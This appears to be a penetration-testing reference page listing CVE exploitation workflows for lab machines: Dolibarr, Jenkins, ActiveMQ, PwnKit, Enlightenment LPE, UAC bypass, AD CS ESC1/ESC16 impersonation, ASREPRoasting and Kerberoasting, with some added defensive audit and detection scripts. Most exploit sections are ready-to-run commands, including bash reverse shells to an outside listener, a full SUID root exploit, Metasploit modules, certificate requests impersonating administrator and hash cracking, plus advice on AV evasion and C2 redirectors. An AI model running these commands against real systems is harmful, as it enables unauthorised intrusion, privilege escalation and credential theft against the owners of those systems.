
Known CVE Exploitation

#Overview

This reference catalogs common CVEs encountered during penetration testing and their exploitation workflows. Each entry covers the vulnerability, detection method, exploitation steps with real commands, and compilation considerations. The focus is on CVEs that appear frequently in lab environments and assessments: CMS exploits, privilege escalation vectors, and Active Directory misconfigurations.

#CVE Exploitation Workflow

#1. Version Detection

```bash
# Web technologies
whatweb <URL>                                          # Technology fingerprint
curl -s <URL> | grep -i "version\|generator"            # HTML meta tags
curl -s <URL>/CHANGELOG.txt                             # Version disclosure files
curl -s <URL>/README.md

# Service versions
nmap -sV -p <port> <IP>                                 # Service version detection
nc <IP> <port>                                          # Banner grab
```

#2. PoC Search

```bash
searchsploit <software> <version>                       # Local Exploit-DB search
searchsploit -m <EDB-ID>                                # Mirror exploit to disk
# GitHub: search for "CVE-XXXX-XXXXX poc"
```

#3. Compilation Considerations

```bash
# Linux: gcc with static linking for older kernels
gcc exploit.c -o exploit -static -pthread               # Static linking avoids glibc mismatch
i686-w64-mingw32-gcc exploit.c -o exploit.exe -static   # Cross-compile for Windows

# .NET: compile with Visual Studio or mcs
mcs -out:exploit.exe exploit.cs                         # Mono C# compiler

# Python: ensure correct version with venv
python3 -m venv env && source env/bin/activate && pip install -r requirements.txt
```

#CVE-2023-30253 -- Dolibarr PHP Command Injection

#Detection

Check version in /README.md or login page footer. Authenticated access is required.

#Exploitation

```bash
# PoC: exploit-db ID 51536
python3 exploit.py -t http://target.com -u admin -p password -c 'bash -c "bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"'
```

#CVE-2024-23897 -- Jenkins CLI Arbitrary File Read

#Detection

Jenkins typically runs on ports 8080 or 50000. The CLI interface on port 50000 is required for exploitation.

#Exploitation

```bash
# Download jenkins-cli.jar
wget http://<IP>:8080/jnlpJars/jenkins-cli.jar

# Read arbitrary file
java -jar jenkins-cli.jar -s http://<IP>:8080/ connect-node @"C:\users\administrator\secret\flag.txt"
java -jar jenkins-cli.jar -s http://<IP>:8080/ who-am-i @"C:\Windows\win.ini"

# Exploit command (if PoC available)
python3 CVE-2024-23897.py -u http://<IP>:8080 -f "/etc/passwd"
```

Note: This CVE was widely featured in Jenkins-based HTB machines.


#CVE-2023-40028 -- Ghost CMS Path Traversal

#Detection

Ghost CMS has a distinctive admin panel at /ghost/. Version may be disclosed in HTTP headers or source code.

#Exploitation

```bash
# Read arbitrary files
curl -s "http://<IP>/ghost/api/v3/admin/db" -H "Authorization: Ghost <valid_session>"
# Path traversal in image upload functionality
```

#CVE-2022-37706 -- Enlightenment 0.25.3 SUID Privilege Escalation

#Detection

```bash
find / -perm -u=s -type f 2>/dev/null | grep enlightenment
dpkg -l | grep enlightenment
enlightenment_version                              # If binary is on PATH
```

#Exploitation

```bash
# enlightenment_sys is SUID and vulnerable on Enlightenment <= 0.25.3
# PoC at: https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod +x /tmp/exploit
echo -n "/tmp/exploit" > /tmp/net/exploit

/usr/bin/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
```

#Apache ActiveMQ -- CVE-2023-46604 (RCE)

#Detection

```bash
nmap -p 61616 --script activemq-info <IP>
curl -s http://<IP>:8161/admin/                     # Check web admin (default: admin/admin)
```

#Exploitation

The OpenWire protocol deserializes untrusted data. Public PoCs exist that trigger RCE by sending crafted packets to port 61616:

```bash
# Metasploit module
use exploit/multi/misc/apache_activemq_rce_cve_2023_46604
set RHOSTS <IP>
set LHOST <LHOST>
run

# Standalone PoC
python3 CVE-2023-46604.py -t <IP> -p 61616 -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"
```

#Nagios XI -- CVE-2021-37343 (Authenticated RCE)

#Detection

Nagios XI runs on ports 80/443. Default credentials: nagiosadmin/nagiosadmin.

#Exploitation

Authenticated users can trigger RCE through configuration upload:

```bash
# Metasploit
use exploit/linux/http/nagios_xi_autodiscovery_webshell
set RHOSTS <IP>
set USERNAME nagiosadmin
set PASSWORD nagiosadmin
set LHOST <LHOST>
run
```

#NSClient++ 0.5.2.35 -- Authenticated RCE

#Detection

NSClient++ runs on port 8443 (HTTPS) with a self-signed certificate. Default password: nsclient.

#Exploitation

Authenticated access to the web interface allows enabling external scripts:

```bash
# Enable external scripts module via web interface
# Upload nc.exe and schedule check
# Or use Metasploit:
use exploit/windows/http/nsclient_authenticated_rce
set RHOSTS <IP>
set PASSWORD nsclient
set LHOST <LHOST>
run
```

#CVE-2021-4034 -- PwnKit (pkexec LPE)

#Detection

```bash
pkexec --version                                       # Check if pkexec exists (usually /usr/bin/pkexec)
which pkexec
dpkg -l | grep policykit-1                            # Check policykit version
```

#Exploitation

Affects most Linux distributions (Ubuntu, Debian, CentOS, RHEL). Works when polkit is installed (default on desktop distros):

```bash
# PoC compilation
git clone https://github.com/berdav/CVE-2021-4034
cd CVE-2021-4034
gcc cve-2021-4034-poc.c -o pwnkit
./pwnkit                                              # Spawns root shell
```

Alternative: Precompiled PoCs exist. Check searchsploit polkit.
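A host-side check for the PwnKit exposure, added here as an example (it is not from the page or from the PoC repository above). Upstream fixed CVE-2021-4034 in polkit 0.120, but distributions backported the fix to older version numbers (Ubuntu's 0.105 packages, for instance), so the version comparison is only a hint to go read the distro changelog; what actually matters is whether pkexec is still a SUID-root binary. The documented interim mitigation is to drop that bit (`chmod 0755 /usr/bin/pkexec`). The `assess()` function works on captured values so it can be exercised offline; `assess_host()` is the live wrapper.

```python
"""Assess a host's exposure to CVE-2021-4034 from pkexec's mode bits and
version string. Example code, not part of the page or the PoC repo."""
import os
import re
import stat
import subprocess

FIX_VERSION = (0, 120)  # upstream polkit release containing the fix


def parse_version(output):
    """Parse 'pkexec version 0.105' style output into a (major, minor) tuple."""
    m = re.search(r"(\d+)\.(\d+)", output)
    if not m:
        raise ValueError(f"unrecognised pkexec version output: {output!r}")
    return int(m.group(1)), int(m.group(2))


def is_suid_root(mode, owner_uid):
    """True when the SUID bit is set and the file is owned by root (uid 0)."""
    return bool(mode & stat.S_ISUID) and owner_uid == 0


def assess(version_output, mode, owner_uid):
    version = parse_version(version_output)
    suid = is_suid_root(mode, owner_uid)
    return {
        "version": version,
        "suid_root": suid,
        "version_predates_fix": version < FIX_VERSION,
        # Without the SUID bit the bug is not a privilege-escalation path at all.
        # With it, a pre-0.120 version means "confirm the distro backport"; the
        # version string alone cannot prove the host is patched.
        "needs_review": suid and version < FIX_VERSION,
        "mitigation": "chmod 0755 %s" % "/usr/bin/pkexec" if suid else None,
    }


def assess_host(path="/usr/bin/pkexec"):
    """Live wrapper: stat the binary and run `pkexec --version` (assumed on PATH)."""
    st = os.stat(path)
    out = subprocess.run([path, "--version"], capture_output=True, text=True).stdout
    return assess(out, st.st_mode, st.st_uid)


if __name__ == "__main__":
    print(assess_host())
```

Run it with no arguments on the host under review; a `needs_review` of `True` means a SUID-root pkexec with a pre-0.120 version string, which the distro package changelog must then confirm or refute.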


#CVE-2019-1388 -- UAC Bypass via Certificate Dialog

#Detection

Windows versions: Windows 7 through Windows 10 (pre-patch), Server 2008 R2 through Server 2019.

#Exploitation

Requires GUI access (RDP or interactive session). Exploits the certificate dialog to spawn an elevated command prompt from a trusted Microsoft binary:

1. Right-click hhupd.exe (or any auto-elevating signed binary) -> Properties -> Digital Signatures -> Details -> View Certificate
2. In the "General" tab, click the "Issuer Statement" link -> opens in browser
3. Save the page, then use "Save As" to spawn explorer.exe as SYSTEM
4. From the SYSTEM explorer, launch cmd.exe

Detailed guide: https://github.com/jas502n/CVE-2019-1388

#CVE-2022-26923 -- ADCS ESC8 / Certifried

#Detection

Check if a Certificate Authority with web enrollment is present:

```bash
certipy-ad find -u '<user>' -p '<pass>' -dc-ip <DC_IP> -vulnerable
```

Look for ESC8 in output.

#Exploitation

NTLM relay to HTTP web enrollment endpoint to obtain a certificate for a Domain Controller machine account:

```bash
certipy-ad relay -ca <CA_IP> -template DomainController
```

#CVE-2022-33679 -- Kerberos RC4-MD4 Downgrade

#Detection

Check the target OS version and patch level: Windows Server 2019/2022 hosts missing the relevant security update are affected.

#Exploitation

Enables ASREPRoasting against service accounts for which Kerberos pre-authentication is not strictly required:

```bash
impacket-GetNPUsers <domain>/ -usersfile users.txt -dc-ip <DC_IP> -request
```

#ESC1 -- Certificate Template Misconfiguration

#Detection

```bash
certipy-ad find -u '<user>@<domain>' -p '<pass>' -dc-ip <DC_IP> -vulnerable -enabled -stdout
# Look for: ENROLLEE_SUPPLIES_SUBJECT flag + Authenticated Users enrollment
```

Alternative: Use Certify from Windows target:

```powershell
.\Certify.exe find /vulnerable
```

#Exploitation

Request a certificate as any user (including Domain Admin) by specifying an arbitrary UPN in the Subject Alternative Name:

```bash
certipy-ad req -u '<user>@<domain>' -p '<pass>' -upn administrator@<domain> -target <CA_IP> -ca '<CA_NAME>' -template '<template_name>'

# Synchronize clock before Kerberos interaction
sudo ntpdate -u <DC_IP>

# Authenticate with certificate
certipy-ad auth -pfx administrator.pfx
```

Then use the extracted NTLM hash for PTH via evil-winrm or psexec.


#ESC16 -- Security Extension Disabled

#Detection

certipy reports "ESC16: Security Extension is disabled" in CA configuration.

#Exploitation

When the CA does not include the szOID_NTDS_CA_SECURITY_EXT extension, the object SID is not embedded in the certificate, allowing an attacker to impersonate any user:

```bash
# Change target account's UPN to administrator
certipy-ad account update -username "<user>@<domain>" -p "<pass>" -user <target_account> -upn 'administrator'

# Request certificate using the modified UPN
certipy-ad req -u '<target_account>' -hashes <hash> -dc-ip '<DC_IP>' -target '<FQDN>' -ca '<CA_NAME>' -template 'User'

# Restore original UPN
certipy-ad account update -username "<user>@<domain>" -p "<pass>" -user <target_account> -upn '<original_upn>'

# Authenticate
certipy-ad auth -pfx administrator.pfx -domain '<domain>' -dc-ip <DC_IP>
```
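The ESC1 and ESC16 conditions above can be audited from the template and CA attributes directly, which is what certipy and Certify do under the hood. The following is an added example (not certipy's or Certify's code) that encodes those conditions over constructed sample data: the flag bits, attribute names and OIDs are the real schema values (`msPKI-Certificate-Name-Flag` bit 0x1 is ENROLLEE_SUPPLIES_SUBJECT, `msPKI-Enrollment-Flag` bit 0x2 is manager approval, `1.3.6.1.4.1.311.25.2` is szOID_NTDS_CA_SECURITY_EXT), while `enrollment_rights` is an assumed simplification of the template's security descriptor and the template and CA dictionaries are invented.

```python
"""Audit AD CS template and CA attributes for ESC1 and ESC16.
Example code; the sample data below is constructed, not from a real domain."""

# msPKI-Certificate-Name-Flag: requester may supply the subject / SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag: issuance waits for certificate manager approval
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002
# EKUs that make a certificate usable for domain authentication
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# szOID_NTDS_CA_SECURITY_EXT: carries the requester's SID in issued certificates
SZOID_NTDS_CA_SECURITY_EXT = "1.3.6.1.4.1.311.25.2"
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


def allows_auth(ekus):
    # No EKU at all means any purpose, which includes client authentication.
    return not ekus or bool(set(ekus) & AUTH_EKUS)


def esc1(template):
    """Return the ESC1 conditions met. The template is ESC1 only when all
    five hold, so a partial match returns an empty list."""
    conditions = [
        (bool(template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
         "ENROLLEE_SUPPLIES_SUBJECT set"),
        (allows_auth(template["pKIExtendedKeyUsage"]), "authentication EKU"),
        (not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS, "no manager approval"),
        (template["msPKI-RA-Signature"] == 0, "no authorized signature required"),
        (bool(set(template["enrollment_rights"]) & LOW_PRIV_PRINCIPALS), "low-privileged enrollment"),
    ]
    return [why for ok, why in conditions] if all(ok for ok, _ in conditions) else []


def esc16(ca):
    """ESC16: the CA strips the SID extension from every certificate it issues,
    so certificate-to-account mapping falls back to the SAN UPN alone."""
    return SZOID_NTDS_CA_SECURITY_EXT in ca["DisableExtensionList"]


def audit(templates, ca):
    return {"esc1": {name: esc1(t) for name, t in templates.items() if esc1(t)},
            "esc16": esc16(ca)}


# Constructed sample data (assumed shapes; enrollment_rights is a simplification).
TEMPLATES = {
    # Duplicated template with "Supply in the request" enabled for all domain users.
    "WebServerCopy": {
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": 0x00000000,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"],
        "enrollment_rights": ["Domain Users"],
    },
    # Default-style User template: subject is built from AD, not supplied.
    "User": {
        "msPKI-Certificate-Name-Flag": 0xA6000000,
        "msPKI-Enrollment-Flag": 0x00000029,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
        "enrollment_rights": ["Domain Users"],
    },
    # Supplies the subject, but a manager must approve each request.
    "ManagerApproved": {
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enrollment_rights": ["Domain Users"],
    },
}
CA = {"Name": "corp-CA-01", "DisableExtensionList": [SZOID_NTDS_CA_SECURITY_EXT]}

if __name__ == "__main__":
    import json
    print(json.dumps(audit(TEMPLATES, CA), indent=2))
```

Only `WebServerCopy` trips ESC1 here: the default User template never lets the requester choose the subject, and `ManagerApproved` breaks the chain at manager approval. The CA sample has the SID extension in its disabled list, which is the ESC16 condition; re-enabling that extension on the CA is the fix for the CA side, and strong certificate mapping on the DC side stops the UPN-only match.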

#ASREPRoasting Workflow

#Detection

```bash
impacket-GetNPUsers <domain>/ -usersfile users.txt -dc-ip <DC_IP> -request
# Users with "Kerberos pre-authentication not required" (UF_DONT_REQUIRE_PREAUTH)
```

#Exploitation

```bash
# Loop through users
while read p; do impacket-GetNPUsers egotistical-bank.local/"$p" -request -no-pass -dc-ip <DC_IP> >> hash.txt; done < unames.txt

# Crack
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
john hash.txt --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt
```

#Kerberoasting Workflow

#Detection

```bash
impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <DC_IP> -request
```

#Exploitation

```bash
hashcat -m 13100 spn_hash.txt /usr/share/wordlists/rockyou.txt
```
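Both the ASREPRoasting and Kerberoasting workflows above (and the CVE-2022-33679 downgrade, which also shows up as a pre-authentication-free TGT request) leave a recognisable trail in the domain controller's Security log: event 4768 with PreAuthType 0 for the AS-REP case, and bursts of event 4769 service tickets with RC4 encryption (0x17) for user-account SPNs in the Kerberoast case. The following added example (not part of the original page or of impacket) runs that detection logic over a few constructed key=value event lines of the kind a SIEM export produces; the field names match the Windows event schema, the values and hosts are invented.

```python
"""Detect AS-REP roasting and Kerberoasting from 4768 / 4769 event exports.
Example code; SAMPLE_EVENTS is constructed, not captured from a real DC."""
from collections import defaultdict

RC4_HMAC = "0x17"        # TicketEncryptionType for RC4-HMAC, the crackable choice
BULK_THRESHOLD = 3       # distinct user-SPN tickets from one source = bulk roasting

# Constructed sample: one event per line, key=value pairs.
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=svc-alfresco ServiceName=krbtgt TicketEncryptionType=0x17 PreAuthType=0 IpAddress=10.10.14.4
EventID=4768 TargetUserName=alice ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 IpAddress=10.10.10.21
EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.14.4
EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.10.14.4
EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.10.14.4
EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=WS01$ TicketEncryptionType=0x12 IpAddress=10.10.10.21
EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.10.10.22
"""


def parse_event(line):
    """Split 'k=v k=v ...' into a dict (values never contain spaces here)."""
    return dict(tok.split("=", 1) for tok in line.split())


def asrep_findings(events):
    """4768 with PreAuthType 0: a TGT was issued with no pre-authentication,
    i.e. the account has UF_DONT_REQUIRE_PREAUTH (or was downgraded). An RC4
    encryption type on that response is the cheapest one to crack offline."""
    out = []
    for e in events:
        if e.get("EventID") == "4768" and e.get("PreAuthType") == "0":
            out.append({"user": e["TargetUserName"], "source": e["IpAddress"],
                        "rc4": e.get("TicketEncryptionType") == RC4_HMAC})
    return out


def kerberoast_findings(events):
    """4769 service tickets encrypted with RC4 for user-account SPNs, grouped by
    requesting IP. Machine accounts (trailing '$') and krbtgt are skipped: their
    keys are long random secrets, so those tickets are noise, not roasting."""
    per_source = defaultdict(set)
    for e in events:
        if e.get("EventID") != "4769" or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_source[e["IpAddress"]].add(svc)
    return {src: {"services": sorted(s), "bulk": len(s) >= BULK_THRESHOLD}
            for src, s in per_source.items()}


def analyse(text):
    events = [parse_event(l) for l in text.splitlines() if l.strip()]
    return {"asrep": asrep_findings(events), "kerberoast": kerberoast_findings(events)}


if __name__ == "__main__":
    import json
    print(json.dumps(analyse(SAMPLE_EVENTS), indent=2))
```

On the sample, the single pre-auth-free TGT for `svc-alfresco` and the three RC4 service tickets pulled by `10.10.14.4` are reported; the machine-account and krbtgt tickets are not. In production the same two rules sit behind most SIEM content for these techniques, with the RC4 condition being the strongest single signal because a domain that has moved its service accounts to AES sees almost no 0x17 tickets at all.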

#Git Repository Exposure

#Detection

```bash
curl -s http://<IP>/.git/HEAD
curl -s http://<IP>/.git/config
git-dumper http://<IP>/.git/ output_dir/
```

#Exploitation

Exposed .git directories reveal source code, configuration files with credentials, and commit history with sensitive data.
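The `curl /.git/HEAD` check above gives false positives on sites that answer 200 for every path (single-page-app fallbacks and soft-404 pages), so a response code alone is not enough when sweeping your own web estate. The following added example (not the page's tooling, and not git-dumper) classifies a captured `/.git/HEAD` response against a response for a random canary path and only reports an exposure when the body is actually shaped like a git HEAD file. The `classify()` function works on captured responses so it runs offline; `check_site()` is a plain `urllib` wrapper (an assumption of this example) for live use.

```python
"""Soft-404-aware check for an exposed .git directory. Example code;
the sample responses at the bottom are constructed."""
import re
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# A real HEAD is one line: a symbolic ref or a bare SHA-1 / SHA-256 object id.
HEAD_RE = re.compile(r"^(ref: refs/\S+|[0-9a-f]{40}|[0-9a-f]{64})$")


def looks_like_git_head(body):
    return bool(HEAD_RE.match(body.strip()))


def classify(head_status, head_body, canary_status, canary_body):
    """Combine the /.git/HEAD response with the response for a path that cannot
    exist. A catch-all route returns the same 200 page for both, which is not
    an exposure; a git-shaped HEAD body is, whatever the canary says."""
    if head_status != 200:
        return "not exposed"
    if looks_like_git_head(head_body):
        return "exposed"
    if canary_status == 200 and canary_body == head_body:
        return "soft-404 (catch-all route, not an exposure)"
    return "200 but not a HEAD file; inspect manually"


def fetch(url):
    """Minimal GET returning (status, first 4 KiB of body). Assumed helper."""
    req = Request(url, headers={"User-Agent": "git-exposure-check"})
    try:
        with urlopen(req, timeout=5) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, ""


def check_site(base):
    base = base.rstrip("/")
    head_status, head_body = fetch(base + "/.git/HEAD")
    canary_status, canary_body = fetch(base + "/.git/canary-path-that-should-404")
    return classify(head_status, head_body, canary_status, canary_body)


# Constructed sample responses: (head_status, head_body, canary_status, canary_body)
SAMPLES = {
    "real-exposure": (200, "ref: refs/heads/main\n", 404, ""),
    "spa-fallback": (200, "<html>app shell</html>", 200, "<html>app shell</html>"),
    "blocked": (403, "", 404, ""),
    "odd-200": (200, "<html>index</html>", 404, ""),
}

if __name__ == "__main__":
    for name, args in SAMPLES.items():
        print(f"{name}: {classify(*args)}")
```

The cure on the server side is to deny the directory outright rather than rely on it being unlinked, for example an nginx `location ~ /\.git { deny all; return 404; }` block, or better still not deploying the repository metadata to the web root at all.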


#Common Pitfalls

  • PoCs from GitHub may require modification (LHOST, LPORT, target paths) -- always review the source before running
  • Cross-compiling for older systems requires static linking or matching glibc -- use the -static flag when in doubt
  • Metasploit payloads are often detected by AV -- consider using custom payloads or obfuscation
  • Time synchronization is critical for Kerberos-based exploits -- run sudo ntpdate -u <DC_IP> before any ticket operations

#OPSEC Considerations

  • PoC execution may leave artifacts (compiled binaries, temp files, core dumps) -- clean up after exploitation
  • Reverse shell callbacks to public IPs may be blocked or alerting -- prefer C2 frameworks with redirectors
  • Multiple failed Kerberos TGT requests may trigger anomaly detection

#Post-Exploitation Value

  • Each CVE typically provides code execution (RCE) or file read leading to credential theft
  • Privilege escalation CVEs (PwnKit, UAC bypass) directly yield SYSTEM or root
  • ADCS ESC vulnerabilities provide path to Domain Admin compromise

#Cross-References

#Tool References

| Tool | Link |
|------|------|
| searchsploit | Built-in (Kali) |
| certipy-ad | https://github.com/ly4k/Certipy |
| Certify | https://github.com/GhostPack/Certify |
| impacket | https://github.com/fortra/impacket |
| hashcat | https://hashcat.net/hashcat/ |

#Source Machines

  • Cerberus (Hard, Linux) - CVE-2022-37706 (Enlightenment LPE)
  • Sauna (Easy, AD) - ASREPRoasting + DCSync
  • Forest (Easy, AD) - ASREPRoasting svc-alfresco
  • Blackfield (Hard, AD) - ASREPRoasting support
  • Escape (Medium, AD) - ESC1 Certificate Template exploitation
  • Fluffy (Easy, AD) - ESC16 exploitation
  • Jeeves (Medium, Windows) - Jenkins unauthenticated access